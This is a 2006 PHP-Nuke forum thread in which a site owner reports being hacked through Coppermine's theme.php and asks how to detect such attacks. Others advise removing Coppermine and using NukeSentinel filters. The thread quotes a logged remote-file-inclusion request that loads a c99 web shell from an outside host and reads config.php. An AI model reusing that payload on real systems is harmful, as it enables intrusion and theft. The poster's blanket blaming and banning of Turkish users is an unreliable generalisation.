| Author |
Message |
Jenses
New Member
Joined: Feb 15, 2006
Posts: 6
|
 Posted:
Thu Feb 16, 2006 1:59 pm |
|
Got hacked by this kind of method (from my sites log)Code:85.97.105.136 - - [16/Feb/2006:01:21:35 +0100] "GET /modules/coppermine/themes/maze/theme.php?THEME_DIR=http%3A%2F%2Fwww.funmekani.com%2Fq%2Fc99shell.txt%3F&act=f&f=config.php&d=%2Fxxxx%2Fxxxx%2Fxxxx%2Fxxxxx%2Fdomain.dk& HTTP/1.1" 200 6224
|
(xxx are replacements from my actual path)
I do now that the theme.php was obsolete and apparently included some bug - this file is removed, but how can I know if there are other files like this one that will open a back door to my system.
My domain is danish so right now many turkish hackers find it to be there right to hack me (muhammed cartoons).
I can ban all turkish IP's - but then they just let theire relatives in Europe do it.
Isnt there a way to catch this kind of hack-attempts?? |
| |
|
|
|
Raven
Site Admin/Owner
Joined: Aug 27, 2002
Posts: 17088
|
| Posted:
Thu Feb 16, 2006 2:01 pm |
|
Get rid of Coppermine if you use nuke. We can't reiterate this enough. Just search the forums for information. |
| |
|
|
|
|
jaded
Theme Guru
Joined: Nov 01, 2003
Posts: 1006
|
| Posted:
Thu Feb 16, 2006 2:26 pm |
|
|
|
|
Raven
|
| Posted:
Thu Feb 16, 2006 4:50 pm |
|
Jenses, Are you at patch level 2,3, or 4 of NukeSentinel v2.4.2? The reason I ask is that I have code in there that would have stopped that. |
| |
|
|
|
|
evaders99
Former Moderator in Good Standing
Joined: Apr 30, 2004
Posts: 3221
|
| Posted:
Thu Feb 16, 2006 5:20 pm |
|
There is code that would have detected this particular Coppermine vulnerability? Or just the cross-scripting part?
What blocker is this in? |
_________________
- Only registered users can see links on this board! Get registered or login! -
Need help? Only registered users can see links on this board! Get registered or login! |
|
|
|
|
Raven
|
| Posted:
Thu Feb 16, 2006 5:49 pm |
|
xss in includes/nukesentinel.php, pl2 I believe handles the hex and there's other code to trap http:// in the url request. |
| |
|
|
|
|
evaders99
|
| Posted:
Thu Feb 16, 2006 10:24 pm |
|
Alright, just curious if there is a way to detect such things directly. We could block all these robots trying various exploits for awstats, other Nuke forks, etc. I'm currently using DisError, so when it gets a 404, it passes through a page where I can filter on they were trying to do. |
| |
|
|
|
|
Jenses
|
| Posted:
Fri Feb 17, 2006 3:10 am |
|
Hi Raven
Im on the newest 2.4.2pl4 - have added the pc-killer
I find it a little 'cheap' to say 'get rid of' - we should be able to detect vunerabilities so code can be changed to stop exploites - I wonder if anyone made a tool to test modules systematicly for all known exploites ?? |
| |
|
|
|
|
Raven
|
| Posted:
Fri Feb 17, 2006 3:50 am |
|
I actually have one started but I put it on the back burner. So, from me, at least, the answer is no. |
| |
|
|
|
|
Jenses
|
| Posted:
Fri Feb 17, 2006 7:22 am |
|
Hope to see that one soon - in the meantime I add the normal "if (!defined('MODULE_FILE')) {..." to my 3 party modules
- - and ban all turkish IP's from my sites |
| |
|
|
|
|
jaded
|
| Posted:
Fri Feb 17, 2006 7:52 am |
|
That will not be enough to secure coppermine. Most of us strongly suggest that you remove it entirely. Best of luck to you |
| |
|
|
|
|
|
|
![[Valid RSS]](https://www.ravenphpscripts.com/images/valid-rss.png "Validate my RSS feed"){kind=small}
